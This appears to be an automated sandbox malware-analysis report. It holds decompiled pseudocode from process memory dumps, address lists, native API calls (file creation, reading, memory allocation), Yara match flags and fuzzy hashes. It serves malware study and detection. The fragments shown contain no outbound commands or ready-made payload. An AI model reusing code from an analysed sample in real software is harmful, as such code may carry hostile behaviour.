                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x94)) = 4;
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
                                                                                                                                                                									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
                                                                                                                                                                									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
                                                                                                                                                                									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
                                                                                                                                                                									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
                                                                                                                                                                									_t163 = _t372 + 0x178; // 0x178
                                                                                                                                                                									E00B32340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
                                                                                                                                                                									E00B32340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
                                                                                                                                                                									_t169 = _t372 + 0xa8; // 0xa8
                                                                                                                                                                									E00BEE649(0, _t370, _t372, _t169);
                                                                                                                                                                									_t170 = _t372 + 0x160; // 0x160
                                                                                                                                                                									E00B4B2FA(_v16, 0, _t170);
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
                                                                                                                                                                									 *(_t341 + 0x10) =  *(_t370 + 8);
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                                                                                                									goto L39;
                                                                                                                                                                								}
                                                                                                                                                                								asm("rdtsc");
                                                                                                                                                                								L32:
                                                                                                                                                                								 *(_t341 + 0x10) = _t271;
                                                                                                                                                                								 *((intOrPtr*)(_t341 + 0x14)) = 0;
                                                                                                                                                                								goto L34;
                                                                                                                                                                							}
                                                                                                                                                                							_t271 = E00BEBCFC();
                                                                                                                                                                							goto L32;
                                                                                                                                                                						}
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_push( &_v68);
                                                                                                                                                                						_push(_v16);
                                                                                                                                                                						_push(_t372);
                                                                                                                                                                						_push( &_v60);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_v68 = 0;
                                                                                                                                                                						_v64 = 0;
                                                                                                                                                                						_t314 = E00B2F900(_v12);
                                                                                                                                                                						_a4 = _t314;
                                                                                                                                                                						__eflags = _t314;
                                                                                                                                                                						if(_t314 < 0) {
                                                                                                                                                                							goto L49;
                                                                                                                                                                						}
                                                                                                                                                                						_t316 =  *(_t372 + 0x88) >> 1;
                                                                                                                                                                						__eflags = _t316 & 0x00000001;
                                                                                                                                                                						if((_t316 & 0x00000001) == 0) {
                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
                                                                                                                                                                							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
                                                                                                                                                                							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
                                                                                                                                                                							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							_t319 =  *((intOrPtr*)(_t372 + 0x68));
                                                                                                                                                                							_t343 =  *(_t372 + 0x8c);
                                                                                                                                                                							_v16 = _t319;
                                                                                                                                                                							__eflags = _t319 + 0xfffffc00 - 0xffc00;
                                                                                                                                                                							if(_t319 + 0xfffffc00 > 0xffc00) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _t343;
                                                                                                                                                                							if(_t343 == 0) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                                							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                                							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							_t348 =  *(_t372 + 0x74);
                                                                                                                                                                							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
                                                                                                                                                                							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_push( &_v68);
                                                                                                                                                                							 *(_t372 + 0x78) = 0;
                                                                                                                                                                							 *(_t372 + 0x7c) = 0;
                                                                                                                                                                							_push( *(_t370 + 0x80));
                                                                                                                                                                							_t348 =  &_v60;
                                                                                                                                                                							_push(_t372);
                                                                                                                                                                							_push( &_v60);
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_t322 = E00B2F938(_v12);
                                                                                                                                                                							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
                                                                                                                                                                							_a4 = _t322;
                                                                                                                                                                							_t323 = _v16;
                                                                                                                                                                							 *(_t370 + 0x100) = _t343;
                                                                                                                                                                							 *(_t370 + 0xd8) = _t343;
                                                                                                                                                                							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
                                                                                                                                                                							 *(_t370 + 0x80) = _t323;
                                                                                                                                                                							 *(_t370 + 0xe8) = _t323;
                                                                                                                                                                							 *(_t370 + 0xf0) = _t343 * _t323;
                                                                                                                                                                							 *(_t370 + 0x5c) = _v12;
                                                                                                                                                                							goto L51;
                                                                                                                                                                						}
                                                                                                                                                                						L18:
                                                                                                                                                                						_a4 = 0xc000000d;
                                                                                                                                                                						goto L49;
                                                                                                                                                                					}
                                                                                                                                                                					_a4 = 0xc0000017;
                                                                                                                                                                					goto L52;
                                                                                                                                                                				}
                                                                                                                                                                				_push(_t340);
                                                                                                                                                                				_push(0x2c);
                                                                                                                                                                				_push( &_v144);
                                                                                                                                                                				_t326 = E00B2FDC0(_t340);
                                                                                                                                                                				_a4 = _t326;
                                                                                                                                                                				if(_t326 < _t340) {
                                                                                                                                                                					goto L54;
                                                                                                                                                                				}
                                                                                                                                                                				_push(_t340);
                                                                                                                                                                				_push(0x1c);
                                                                                                                                                                				_push( &_v172);
                                                                                                                                                                				_push(_t340);
                                                                                                                                                                				_t328 = E00B2FC18(0xfffffffe);
                                                                                                                                                                				_a4 = _t328;
                                                                                                                                                                				if(_t328 < _t340) {
                                                                                                                                                                					goto L54;
                                                                                                                                                                				}
                                                                                                                                                                				_push(_t340);
                                                                                                                                                                				_push(0x20);
                                                                                                                                                                				_push( &_v100);
                                                                                                                                                                				_push(1);
                                                                                                                                                                				_t330 = E00B2FC18(0xfffffffe);
                                                                                                                                                                				_a4 = _t330;
                                                                                                                                                                				if(_t330 < _t340) {
                                                                                                                                                                					goto L54;
                                                                                                                                                                				}
                                                                                                                                                                				_push(_t340);
                                                                                                                                                                				_push(0x30);
                                                                                                                                                                				_push( &_v220);
                                                                                                                                                                				_t332 = E00B2FDC0(3);
                                                                                                                                                                				_a4 = _t332;
                                                                                                                                                                				if(_t332 < _t340) {
                                                                                                                                                                					goto L54;
                                                                                                                                                                				}
                                                                                                                                                                				_t334 = E00B88001(_t348, _t360, _t370, _t340,  &_v20);
                                                                                                                                                                				_a4 = _t334;
                                                                                                                                                                				if(_t334 < _t340) {
                                                                                                                                                                					goto L54;
                                                                                                                                                                				}
                                                                                                                                                                				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
                                                                                                                                                                				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
                                                                                                                                                                				goto L12;
                                                                                                                                                                			}

                                                                                                                                                                0x00beecc9
                                                                                                                                                                0x00beecd2
                                                                                                                                                                0x00beecd5
                                                                                                                                                                0x00beece5
                                                                                                                                                                0x00beece8
                                                                                                                                                                0x00beeceb
                                                                                                                                                                0x00beecf3
                                                                                                                                                                0x00beecf9
                                                                                                                                                                0x00beecfc
                                                                                                                                                                0x00beed02
                                                                                                                                                                0x00beed0d
                                                                                                                                                                0x00beed23
                                                                                                                                                                0x00beed37
                                                                                                                                                                0x00beed40
                                                                                                                                                                0x00beed49
                                                                                                                                                                0x00beed52
                                                                                                                                                                0x00beed58
                                                                                                                                                                0x00beed5c
                                                                                                                                                                0x00beed67
                                                                                                                                                                0x00beed6d
                                                                                                                                                                0x00beed76
                                                                                                                                                                0x00beed7c
                                                                                                                                                                0x00beed82
                                                                                                                                                                0x00beed88
                                                                                                                                                                0x00beed92
                                                                                                                                                                0x00beed9b
                                                                                                                                                                0x00beeda7
                                                                                                                                                                0x00beedb3
                                                                                                                                                                0x00beedbf
                                                                                                                                                                0x00beedcb
                                                                                                                                                                0x00beedd2
                                                                                                                                                                0x00beedd9
                                                                                                                                                                0x00beede2
                                                                                                                                                                0x00beedf2
                                                                                                                                                                0x00beedf9
                                                                                                                                                                0x00beee14
                                                                                                                                                                0x00beee1c
                                                                                                                                                                0x00beee23
                                                                                                                                                                0x00beee28
                                                                                                                                                                0x00beee2f
                                                                                                                                                                0x00beee36
                                                                                                                                                                0x00beee3f
                                                                                                                                                                0x00beee48
                                                                                                                                                                0x00beee4e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beee4e
                                                                                                                                                                0x00beecd7
                                                                                                                                                                0x00beecd9
                                                                                                                                                                0x00beecd9
                                                                                                                                                                0x00beecdc
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beecdc
                                                                                                                                                                0x00beeccb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeccb
                                                                                                                                                                0x00beeba0
                                                                                                                                                                0x00beeba4
                                                                                                                                                                0x00beeba5
                                                                                                                                                                0x00beebab
                                                                                                                                                                0x00beebac
                                                                                                                                                                0x00beebad
                                                                                                                                                                0x00beebae
                                                                                                                                                                0x00beebaf
                                                                                                                                                                0x00beebb3
                                                                                                                                                                0x00beebb6
                                                                                                                                                                0x00beebb9
                                                                                                                                                                0x00beebbe
                                                                                                                                                                0x00beebc1
                                                                                                                                                                0x00beebc3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebcf
                                                                                                                                                                0x00beebd1
                                                                                                                                                                0x00beebd3
                                                                                                                                                                0x00beebe4
                                                                                                                                                                0x00beebea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebef
                                                                                                                                                                0x00beebf5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebf7
                                                                                                                                                                0x00beebfe
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec00
                                                                                                                                                                0x00beec03
                                                                                                                                                                0x00beec09
                                                                                                                                                                0x00beec11
                                                                                                                                                                0x00beec16
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec1a
                                                                                                                                                                0x00beec1c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec21
                                                                                                                                                                0x00beec21
                                                                                                                                                                0x00beec24
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec26
                                                                                                                                                                0x00beec29
                                                                                                                                                                0x00beec2c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec2e
                                                                                                                                                                0x00beec32
                                                                                                                                                                0x00beec33
                                                                                                                                                                0x00beec36
                                                                                                                                                                0x00beec39
                                                                                                                                                                0x00beec3f
                                                                                                                                                                0x00beec42
                                                                                                                                                                0x00beec43
                                                                                                                                                                0x00beec44
                                                                                                                                                                0x00beec45
                                                                                                                                                                0x00beec46
                                                                                                                                                                0x00beec4a
                                                                                                                                                                0x00beec4f
                                                                                                                                                                0x00beec56
                                                                                                                                                                0x00beec59
                                                                                                                                                                0x00beec5c
                                                                                                                                                                0x00beec62
                                                                                                                                                                0x00beec6b
                                                                                                                                                                0x00beec72
                                                                                                                                                                0x00beec78
                                                                                                                                                                0x00beec81
                                                                                                                                                                0x00beec87
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec87
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00beeb5e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeb5e
                                                                                                                                                                0x00beea9a
                                                                                                                                                                0x00beea9b
                                                                                                                                                                0x00beeaa3
                                                                                                                                                                0x00beeaa5
                                                                                                                                                                0x00beeaac
                                                                                                                                                                0x00beeaaf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeab5
                                                                                                                                                                0x00beeab6
                                                                                                                                                                0x00beeabe
                                                                                                                                                                0x00beeabf
                                                                                                                                                                0x00beeac2
                                                                                                                                                                0x00beeac9
                                                                                                                                                                0x00beeacc
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beead2
                                                                                                                                                                0x00beead3
                                                                                                                                                                0x00beead8
                                                                                                                                                                0x00beead9
                                                                                                                                                                0x00beeadd
                                                                                                                                                                0x00beeae4
                                                                                                                                                                0x00beeae7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEED1C
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEED32
                                                                                                                                                                  • Part of subcall function 00B2F900: LdrInitializeThunk.NTDLL ref: 00B2F90E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                • String ID: athan
                                                                                                                                                                • API String ID: 1404860816-369431050
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                			E00BEC371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                				short _t58;
                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                				signed char _t63;
                                                                                                                                                                				signed int _t65;
                                                                                                                                                                				signed int _t74;
                                                                                                                                                                				signed int _t75;
                                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                                				signed int _t80;
                                                                                                                                                                				signed int _t82;
                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                				signed int _t89;
                                                                                                                                                                				signed int _t90;
                                                                                                                                                                				intOrPtr* _t91;
                                                                                                                                                                				signed int _t93;
                                                                                                                                                                				signed int _t94;
                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                
                                                                                                                                                                				_t87 = __edx;
                                                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                				_t80 = _a8;
                                                                                                                                                                				_t57 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                				if(_t57 <= 0) {
                                                                                                                                                                					_t57 =  *((intOrPtr*)(_t80 + 8));
                                                                                                                                                                				}
                                                                                                                                                                				_t97 = _a4;
                                                                                                                                                                				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
                                                                                                                                                                				_t89 =  *((intOrPtr*)(_t97 + 0x80));
                                                                                                                                                                				_t58 = _a12;
                                                                                                                                                                				_a8 = _t89;
                                                                                                                                                                				if(_t57 != 0x48 || _t58 == 1) {
                                                                                                                                                                					 *((short*)(_t80 + 0x34)) = _t58;
                                                                                                                                                                					 *((intOrPtr*)(_t80 + 0x10)) = E00BEBCFC();
                                                                                                                                                                					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
                                                                                                                                                                					__eflags =  *(_t97 + 0x5c);
                                                                                                                                                                					if( *(_t97 + 0x5c) == 0) {
                                                                                                                                                                						goto L25;
                                                                                                                                                                					}
                                                                                                                                                                					_t61 =  *((intOrPtr*)(_t80 + 0x30));
                                                                                                                                                                					__eflags = _t61 - _t89;
                                                                                                                                                                					if(_t61 < _t89) {
                                                                                                                                                                						_t78 = _t61 + _t80;
                                                                                                                                                                						__eflags = _t61 + _t80;
                                                                                                                                                                						E00B3DFC0(_t78, 0xff, _t89 - _t61);
                                                                                                                                                                					}
                                                                                                                                                                					_t90 =  *(_t97 + 0xcc);
                                                                                                                                                                					_t63 = _t90 >> 3;
                                                                                                                                                                					__eflags = _t63 & 0x00000001;
                                                                                                                                                                					if((_t63 & 0x00000001) != 0) {
                                                                                                                                                                						_v16 = 2;
                                                                                                                                                                					}
                                                                                                                                                                					_t82 =  *(_t97 + 0xc8);
                                                                                                                                                                					__eflags = _t82;
                                                                                                                                                                					if(_t82 <= 0) {
                                                                                                                                                                						L18:
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_t91 = _t97 + 0xf0;
                                                                                                                                                                						_push(_t91);
                                                                                                                                                                						_push(_a8);
                                                                                                                                                                						_push(_t80);
                                                                                                                                                                						_push( &_v24);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_push(0);
                                                                                                                                                                						_t65 = E00B2F938( *(_t97 + 0x5c));
                                                                                                                                                                						_v8 = _t65;
                                                                                                                                                                						__eflags = _t65;
                                                                                                                                                                						if(_t65 < 0) {
                                                                                                                                                                							__eflags = _t65 - 0x80000022;
                                                                                                                                                                							if(_t65 == 0x80000022) {
                                                                                                                                                                								goto L25;
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _v8 - 2;
                                                                                                                                                                							if(_v8 == 2) {
                                                                                                                                                                								goto L25;
                                                                                                                                                                							}
                                                                                                                                                                							goto L24;
                                                                                                                                                                						}
                                                                                                                                                                						 *_t91 =  *_t91 + _a8;
                                                                                                                                                                						asm("adc dword [edi+0x4], 0x0");
                                                                                                                                                                						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
                                                                                                                                                                						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
                                                                                                                                                                						goto L25;
                                                                                                                                                                					} else {
                                                                                                                                                                						asm("sbb eax, eax");
                                                                                                                                                                						asm("cdq");
                                                                                                                                                                						_v12 = E00B5F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
                                                                                                                                                                						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
                                                                                                                                                                						_t75 = _t74 * _a8;
                                                                                                                                                                						__eflags = _t74 * _a8 >> 0x20 - _t87;
                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                							goto L18;
                                                                                                                                                                						}
                                                                                                                                                                						if(__eflags > 0) {
                                                                                                                                                                							L14:
                                                                                                                                                                							_t93 = (_t90 & 0x0000000b) - 1;
                                                                                                                                                                							__eflags = _t93;
                                                                                                                                                                							if(_t93 == 0) {
                                                                                                                                                                								_v8 = 0xc0000188;
                                                                                                                                                                								L24:
                                                                                                                                                                								_t54 = _t97 + 0xfc;
                                                                                                                                                                								 *_t54 =  *(_t97 + 0xfc) + 1;
                                                                                                                                                                								__eflags =  *_t54;
                                                                                                                                                                								goto L25;
                                                                                                                                                                							}
                                                                                                                                                                							_t94 = _t93 - 1;
                                                                                                                                                                							__eflags = _t94;
                                                                                                                                                                							if(_t94 == 0) {
                                                                                                                                                                								_t76 = _t97 + 0xe8;
                                                                                                                                                                								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
                                                                                                                                                                								_t86 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                                								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                                								 *((intOrPtr*)(_t97 + 0xd8)) = E00B74FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
                                                                                                                                                                							} else {
                                                                                                                                                                								__eflags = _t94 == 6;
                                                                                                                                                                								if(_t94 == 6) {
                                                                                                                                                                									_t34 = _t97 + 0xd4;
                                                                                                                                                                									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
                                                                                                                                                                									__eflags =  *_t34;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							goto L18;
                                                                                                                                                                						}
                                                                                                                                                                						__eflags = _t75 - _v12;
                                                                                                                                                                						if(_t75 < _v12) {
                                                                                                                                                                							goto L18;
                                                                                                                                                                						}
                                                                                                                                                                						goto L14;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					_v8 = 0x80000022;
                                                                                                                                                                					L25:
                                                                                                                                                                					return _v8;
                                                                                                                                                                				}
                                                                                                                                                                			}

























                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEC4BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: "$athan
                                                                                                                                                                • API String ID: 885266447-2304005628
                                                                                                                                                                • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                                • Instruction ID: d44d05c3b5de051c621aefdf848b00ca785b817b9c73a02c0f04e4982e6835b0
                                                                                                                                                                • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                                • Instruction Fuzzy Hash: D2418B72500645AFEB24DF65C885BBABBF5FB44304F1484A9E85A9B382D734EE42CB10
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                APIs
                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                • Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
                                                                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                • Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID: =
                                                                                                                                                                • API String ID: 3535843008-3560468456
                                                                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                • Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
                                                                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                • Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
